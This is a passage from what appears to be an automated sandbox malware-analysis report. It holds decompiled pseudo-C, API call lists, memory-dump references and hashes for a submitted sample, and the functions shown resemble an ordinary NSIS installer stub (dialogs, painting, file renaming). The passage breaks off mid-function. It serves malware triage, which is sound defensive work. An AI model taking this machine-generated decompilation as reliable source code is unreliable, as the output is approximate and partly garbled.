                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID: C:\Users\user\AppData\Local\Temp
                  • API String ID: 123533781-1104044542
                  • Opcode ID: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                  • Instruction ID: 9a85de16ea5d7a81ede148d9b78cdb1ba9a910f30d2aff7a9c0f788a9809de35
                  • Opcode Fuzzy Hash: c224b754a24e27b0a3ecd9e0cc6c3a384ffadc9b3130a9beb9220e72134f7772
                  • Instruction Fuzzy Hash: 0E414DB5A00104AFDB00DFA4CD89E9E7BBABF49314B20416AF905EB2D1DA79DD41CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E00402630(char __ebx, char* __edi, char* __esi) {
                  				void* _t19;
                  
                  				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                  					E004059E3(__edi, _t6);
                  					_push(_t19 - 0x178);
                  					_push(__esi);
                  					E00405A85();
                  				} else {
                  					 *__edi = __ebx;
                  					 *__esi = __ebx;
                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                  				}
                  				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                  				return 0;
                  			}

                  APIs
                  • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: FileFindFirst
                  • String ID:
                  • API String ID: 1974802433-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.352276788.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_21b0000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                  				struct HWND__* _v32;
                  				void* _v84;
                  				void* _v88;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t35;
                  				signed int _t37;
                  				signed int _t39;
                  				struct HWND__* _t49;
                  				signed int _t67;
                  				struct HWND__* _t73;
                  				signed int _t86;
                  				struct HWND__* _t91;
                  				signed int _t99;
                  				int _t103;
                  				signed int _t115;
                  				signed int _t116;
                  				int _t117;
                  				signed int _t122;
                  				struct HWND__* _t125;
                  				struct HWND__* _t126;
                  				int _t127;
                  				long _t130;
                  				int _t132;
                  				int _t133;
                  				void* _t134;
                  
                  				_t115 = _a8;
                  				if(_t115 == 0x110 || _t115 == 0x408) {
                  					_t35 = _a12;
                  					_t125 = _a4;
                  					__eflags = _t115 - 0x110;
                  					 *0x42047c = _t35;
                  					if(_t115 == 0x110) {
                  						 *0x423ea8 = _t125;
                  						 *0x420490 = GetDlgItem(_t125, 1);
                  						_t91 = GetDlgItem(_t125, 2);
                  						_push(0xffffffff);
                  						_push(0x1c);
                  						 *0x41f458 = _t91;
                  						E00403E37(_t125);
                  						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                  						 *0x42366c = E0040140B(4);
                  						_t35 = 1;
                  						__eflags = 1;
                  						 *0x42047c = 1;
                  					}
                  					_t122 =  *0x4091bc; // 0xffffffff
                  					_t133 = 0;
                  					_t130 = (_t122 << 6) +  *0x423ec0;
                  					__eflags = _t122;
                  					if(_t122 < 0) {
                  						L34:
                  						E00403E83(0x40b);
                  						while(1) {
                  							_t37 =  *0x42047c;
                  							 *0x4091bc =  *0x4091bc + _t37;
                  							_t130 = _t130 + (_t37 << 6);
                  							_t39 =  *0x4091bc; // 0xffffffff
                  							__eflags = _t39 -  *0x423ec4;
                  							if(_t39 ==  *0x423ec4) {
                  								E0040140B(1);
                  							}
                  							__eflags =  *0x42366c - _t133;
                  							if( *0x42366c != _t133) {
                  								break;
                  							}
                  							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
                  							if(__eflags >= 0) {
                  								break;
                  							}
                  							_t116 =  *(_t130 + 0x14);
                  							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                  							_push( *((intOrPtr*)(_t130 + 0x20)));
                  							_push(0xfffffc19);
                  							E00403E37(_t125);
                  							_push( *((intOrPtr*)(_t130 + 0x1c)));
                  							_push(0xfffffc1b);
                  							E00403E37(_t125);
                  							_push( *((intOrPtr*)(_t130 + 0x28)));
                  							_push(0xfffffc1a);
                  							E00403E37(_t125);
                  							_t49 = GetDlgItem(_t125, 3);
                  							__eflags =  *0x423f2c - _t133;
                  							_v32 = _t49;
                  							if( *0x423f2c != _t133) {
                  								_t116 = _t116 & 0x0000fefd | 0x00000004;
                  								__eflags = _t116;
                  							}
                  							ShowWindow(_t49, _t116 & 0x00000008);
                  							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                  							E00403E59(_t116 & 0x00000002);
                  							_t117 = _t116 & 0x00000004;
                  							EnableWindow( *0x41f458, _t117);
                  							__eflags = _t117 - _t133;
                  							if(_t117 == _t133) {
                  								_push(1);
                  							} else {
                  								_push(_t133);
                  							}
                  							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                  							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                  							__eflags =  *0x423f2c - _t133;
                  							if( *0x423f2c == _t133) {
                  								_push( *0x420490);
                  							} else {
                  								SendMessageA(_t125, 0x401, 2, _t133);
                  								_push( *0x41f458);
                  							}
                  							E00403E6C();
                  							E00405A85(0x420498, 0x4236a0);
                  							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                  							SetWindowTextA(_t125, 0x420498);
                  							_push(_t133);
                  							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                  							__eflags = _t67;
                  							if(_t67 != 0) {
                  								continue;
                  							} else {
                  								__eflags =  *_t130 - _t133;
                  								if( *_t130 == _t133) {
                  									continue;
                  								}
                  								__eflags =  *(_t130 + 4) - 5;
                  								if( *(_t130 + 4) != 5) {
                  									DestroyWindow( *0x423678);
                  									 *0x41fc68 = _t130;
                  									__eflags =  *_t130 - _t133;
                  									if( *_t130 <= _t133) {
                  										goto L58;
                  									}
                  									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                  									__eflags = _t73 - _t133;
                  									 *0x423678 = _t73;
                  									if(_t73 == _t133) {
                  										goto L58;
                  									}
                  									_push( *((intOrPtr*)(_t130 + 0x2c)));
                  									_push(6);
                  									E00403E37(_t73);
                  									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                  									ScreenToClient(_t125, _t134 + 0x10);
                  									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                  									_push(_t133);
                  									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                  									__eflags =  *0x42366c - _t133;
                  									if( *0x42366c != _t133) {
                  										goto L61;
                  									}
                  									ShowWindow( *0x423678, 8);
                  									E00403E83(0x405);
                  									goto L58;
                  								}
                  								__eflags =  *0x423f2c - _t133;
                  								if( *0x423f2c != _t133) {
                  									goto L61;
                  								}
                  								__eflags =  *0x423f20 - _t133;
                  								if( *0x423f20 != _t133) {
                  									continue;
                  								}
                  								goto L61;
                  							}
                  						}
                  						DestroyWindow( *0x423678);
                  						 *0x423ea8 = _t133;
                  						EndDialog(_t125,  *0x41f860);
                  						goto L58;
                  					} else {
                  						__eflags = _t35 - 1;
                  						if(_t35 != 1) {
                  							L33:
                  							__eflags =  *_t130 - _t133;
                  							if( *_t130 == _t133) {
                  								goto L61;
                  							}
                  							goto L34;
                  						}
                  						_push(0);
                  						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                  						__eflags = _t86;
                  						if(_t86 == 0) {
                  							goto L33;
                  						}
                  						SendMessageA( *0x423678, 0x40f, 0, 1);
                  						__eflags =  *0x42366c;
                  						return 0 |  *0x42366c == 0x00000000;
                  					}
                  				} else {
                  					_t125 = _a4;
                  					_t133 = 0;
                  					if(_t115 == 0x47) {
                  						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                  					}
                  					if(_t115 == 5) {
                  						asm("sbb eax, eax");
                  						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                  					}
                  					if(_t115 != 0x40d) {
                  						__eflags = _t115 - 0x11;
                  						if(_t115 != 0x11) {
                  							__eflags = _t115 - 0x111;
                  							if(_t115 != 0x111) {
                  								L26:
                  								return E00403E9E(_t115, _a12, _a16);
                  							}
                  							_t132 = _a12 & 0x0000ffff;
                  							_t126 = GetDlgItem(_t125, _t132);
                  							__eflags = _t126 - _t133;
                  							if(_t126 == _t133) {
                  								L13:
                  								__eflags = _t132 - 1;
                  								if(_t132 != 1) {
                  									__eflags = _t132 - 3;
                  									if(_t132 != 3) {
                  										_t127 = 2;
                  										__eflags = _t132 - _t127;
                  										if(_t132 != _t127) {
                  											L25:
                  											SendMessageA( *0x423678, 0x111, _a12, _a16);
                  											goto L26;
                  										}
                  										__eflags =  *0x423f2c - _t133;
                  										if( *0x423f2c == _t133) {
                  											_t99 = E0040140B(3);
                  											__eflags = _t99;
                  											if(_t99 != 0) {
                  												goto L26;
                  											}
                  											 *0x41f860 = 1;
                  											L21:
                  											_push(0x78);
                  											L22:
                  											E00403E10();
                  											goto L26;
                  										}
                  										E0040140B(_t127);
                  										 *0x41f860 = _t127;
                  										goto L21;
                  									}
                  									__eflags =  *0x4091bc - _t133; // 0xffffffff
                  									if(__eflags <= 0) {
                  										goto L25;
                  									}
                  									_push(0xffffffff);
                  									goto L22;
                  								}
                  								_push(_t132);
                  								goto L22;
                  							}
                  							SendMessageA(_t126, 0xf3, _t133, _t133);
                  							_t103 = IsWindowEnabled(_t126);
                  							__eflags = _t103;
                  							if(_t103 == 0) {
                  								goto L61;
                  							}
                  							goto L13;
                  						}
                  						SetWindowLongA(_t125, _t133, _t133);
                  						return 1;
                  					} else {
                  						DestroyWindow( *0x423678);
                  						 *0x423678 = _a12;
                  						L58:
                  						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
                  							ShowWindow(_t125, 0xa);
                  							 *0x421498 = 1;
                  						}
                  						L61:
                  						return 0;
                  					}
                  				}
                  			}































                  APIs
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                  • ShowWindow.USER32(?), ref: 004039BD
                  • DestroyWindow.USER32 ref: 004039D1
                  • SetWindowLongA.USER32 ref: 004039ED
                  • GetDlgItem.USER32 ref: 00403A0E
                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
                  • IsWindowEnabled.USER32(00000000), ref: 00403A29
                  • GetDlgItem.USER32 ref: 00403AD7
                  • GetDlgItem.USER32 ref: 00403AE1
                  • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
                  • GetDlgItem.USER32 ref: 00403BF2
                  • ShowWindow.USER32(00000000,?), ref: 00403C13
                  • EnableWindow.USER32(?,?), ref: 00403C25
                  • EnableWindow.USER32(?,?), ref: 00403C40
                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                  • EnableMenuItem.USER32 ref: 00403C5D
                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
                  • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                  • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                  • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                  • String ID:
                  • API String ID: 184305955-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                  				char _v8;
                  				signed int _v12;
                  				void* _v16;
                  				struct HWND__* _t52;
                  				long _t86;
                  				int _t98;
                  				struct HWND__* _t99;
                  				signed int _t100;
                  				intOrPtr _t103;
                  				intOrPtr _t109;
                  				int _t110;
                  				signed int* _t112;
                  				signed int _t113;
                  				char* _t114;
                  				CHAR* _t115;
                  
                  				if(_a8 != 0x110) {
                  					if(_a8 != 0x111) {
                  						L11:
                  						if(_a8 != 0x4e) {
                  							if(_a8 == 0x40b) {
                  								 *0x420478 =  *0x420478 + 1;
                  							}
                  							L25:
                  							_t110 = _a16;
                  							L26:
                  							return E00403E9E(_a8, _a12, _t110);
                  						}
                  						_t52 = GetDlgItem(_a4, 0x3e8);
                  						_t110 = _a16;
                  						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                  							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                  							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                  							_v12 = _t100;
                  							_v16 = _t109;
                  							_v8 = 0x422e40;
                  							if(_t100 - _t109 < 0x800) {
                  								SendMessageA(_t52, 0x44b, 0,  &_v16);
                  								SetCursor(LoadCursorA(0, 0x7f02));
                  								_t40 =  &_v8; // 0x422e40
                  								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                  								SetCursor(LoadCursorA(0, 0x7f00));
                  								_t110 = _a16;
                  							}
                  						}
                  						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                  							goto L26;
                  						} else {
                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                  								SendMessageA( *0x423ea8, 0x111, 1, 0);
                  							}
                  							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                  								SendMessageA( *0x423ea8, 0x10, 0, 0);
                  							}
                  							return 1;
                  						}
                  					}
                  					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                  						goto L25;
                  					} else {
                  						_t103 =  *0x41fc68; // 0x0
                  						_t25 = _t103 + 0x14; // 0x14
                  						_t112 = _t25;
                  						if(( *_t112 & 0x00000020) == 0) {
                  							goto L25;
                  						}
                  						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                  						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                  						E0040420A();
                  						goto L11;
                  					}
                  				}
                  				_t98 = _a16;
                  				_t113 =  *(_t98 + 0x30);
                  				if(_t113 < 0) {
                  					_t113 =  *( *0x42367c - 4 + _t113 * 4);
                  				}
                  				_push( *((intOrPtr*)(_t98 + 0x34)));
                  				_t114 = _t113 +  *0x423ed8;
                  				_push(0x22);
                  				_a16 =  *_t114;
                  				_v12 = _v12 & 0x00000000;
                  				_t115 = _t114 + 1;
                  				_v16 = _t115;
                  				_v8 = E00403F4B;
                  				E00403E37(_a4);
                  				_push( *((intOrPtr*)(_t98 + 0x38)));
                  				_push(0x23);
                  				E00403E37(_a4);
                  				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                  				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                  				_t99 = GetDlgItem(_a4, 0x3e8);
                  				E00403E6C(_t99);
                  				SendMessageA(_t99, 0x45b, 1, 0);
                  				_t86 =  *( *0x423eb0 + 0x68);
                  				if(_t86 < 0) {
                  					_t86 = GetSysColor( ~_t86);
                  				}
                  				SendMessageA(_t99, 0x443, 0, _t86);
                  				SendMessageA(_t99, 0x445, 0, 0x4010000);
                  				 *0x41f45c =  *0x41f45c & 0x00000000;
                  				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                  				SendMessageA(_t99, 0x449, _a16,  &_v16);
                  				 *0x420478 =  *0x420478 & 0x00000000;
                  				return 0;
                  			}

                  APIs
                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040400A
                  • GetDlgItem.USER32 ref: 0040401E
                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
                  • GetSysColor.USER32(?), ref: 0040404D
                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
                  • lstrlenA.KERNEL32(?), ref: 00404075
                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
                  • GetDlgItem.USER32 ref: 004040F5
                  • SendMessageA.USER32(00000000), ref: 004040F8
                  • GetDlgItem.USER32 ref: 00404123
                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
                  • LoadCursorA.USER32 ref: 00404172
                  • SetCursor.USER32(00000000), ref: 0040417B
                  • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
                  • LoadCursorA.USER32 ref: 0040419B
                  • SetCursor.USER32(00000000), ref: 0040419E
                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                  • String ID: @.B$N$open
                  • API String ID: 3615053054-3815657624
                  • Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                  • Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
                  • Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
                  • Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                  				struct tagLOGBRUSH _v16;
                  				struct tagRECT _v32;
                  				struct tagPAINTSTRUCT _v96;
                  				struct HDC__* _t70;
                  				struct HBRUSH__* _t87;
                  				struct HFONT__* _t94;
                  				long _t102;
                  				signed int _t126;
                  				struct HDC__* _t128;
                  				intOrPtr _t130;
                  
                  				if(_a8 == 0xf) {
                  					_t130 =  *0x423eb0;
                  					_t70 = BeginPaint(_a4,  &_v96);
                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                  					_a8 = _t70;
                  					GetClientRect(_a4,  &_v32);
                  					_t126 = _v32.bottom;
                  					_v32.bottom = _v32.bottom & 0x00000000;
                  					while(_v32.top < _t126) {
                  						_a12 = _t126 - _v32.top;
                  						asm("cdq");
                  						asm("cdq");
                  						asm("cdq");
                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                  						_t87 = CreateBrushIndirect( &_v16);
                  						_v32.bottom = _v32.bottom + 4;
                  						_a16 = _t87;
                  						FillRect(_a8,  &_v32, _t87);
                  						DeleteObject(_a16);
                  						_v32.top = _v32.top + 4;
                  					}
                  					if( *(_t130 + 0x58) != 0xffffffff) {
                  						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                  						_a16 = _t94;
                  						if(_t94 != 0) {
                  							_t128 = _a8;
                  							_v32.left = 0x10;
                  							_v32.top = 8;
                  							SetBkMode(_t128, 1);
                  							SetTextColor(_t128,  *(_t130 + 0x58));
                  							_a8 = SelectObject(_t128, _a16);
                  							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
                  							SelectObject(_t128, _a8);
                  							DeleteObject(_a16);
                  						}
                  					}
                  					EndPaint(_a4,  &_v96);
                  					return 0;
                  				}
                  				_t102 = _a16;
                  				if(_a8 == 0x46) {
                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                  					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
                  				}
                  				return DefWindowProcA(_a4, _a8, _a12, _t102);
                  			}

                  APIs
                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                  • BeginPaint.USER32(?,?), ref: 00401047
                  • GetClientRect.USER32 ref: 0040105B
                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                  • FillRect.USER32 ref: 004010E4
                  • DeleteObject.GDI32(?), ref: 004010ED
                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                  • SelectObject.GDI32(00000000,?), ref: 00401140
                  • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                  • DeleteObject.GDI32(?), ref: 00401165
                  • EndPaint.USER32(?,?), ref: 0040116E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                  • String ID: F
                  • API String ID: 941294808-1304234792
                  • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                  • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                  • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                  • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E004057D3() {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				intOrPtr* _t15;
                  				long _t16;
                  				int _t20;
                  				void* _t28;
                  				long _t29;
                  				intOrPtr* _t37;
                  				int _t43;
                  				void* _t44;
                  				long _t47;
                  				CHAR* _t49;
                  				void* _t51;
                  				void* _t53;
                  				intOrPtr* _t54;
                  				void* _t55;
                  				void* _t56;
                  
                  				_t15 = E00405DA3(1);
                  				_t49 =  *(_t55 + 0x18);
                  				if(_t15 != 0) {
                  					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                  					if(_t20 != 0) {
                  						L16:
                  						 *0x423f30 =  *0x423f30 + 1;
                  						return _t20;
                  					}
                  				}
                  				 *0x422628 = 0x4c554e;
                  				if(_t49 == 0) {
                  					L5:
                  					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                  					if(_t16 != 0 && _t16 <= 0x400) {
                  						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                  						_t56 = _t55 + 0x10;
                  						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
                  						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                  						_t53 = _t20;
                  						 *(_t56 + 0x14) = _t53;
                  						if(_t53 == 0xffffffff) {
                  							goto L16;
                  						}
                  						_t47 = GetFileSize(_t53, 0);
                  						_t7 = _t43 + 0xa; // 0xa
                  						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                  						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                  							L15:
                  							_t20 = CloseHandle(_t53);
                  							goto L16;
                  						} else {
                  							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                  								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                  								if(_t28 == 0) {
                  									L13:
                  									_t29 = _t47;
                  									L14:
                  									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                  									SetFilePointer(_t53, 0, 0, 0);
                  									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                  									GlobalFree(_t51);
                  									goto L15;
                  								}
                  								_t37 = _t28 + 1;
                  								_t44 = _t51 + _t47;
                  								_t54 = _t37;
                  								if(_t37 >= _t44) {
                  									L21:
                  									_t53 =  *(_t56 + 0x14);
                  									_t29 = _t37 - _t51;
                  									goto L14;
                  								} else {
                  									goto L20;
                  								}
                  								do {
                  									L20:
                  									 *((char*)(_t43 + _t54)) =  *_t54;
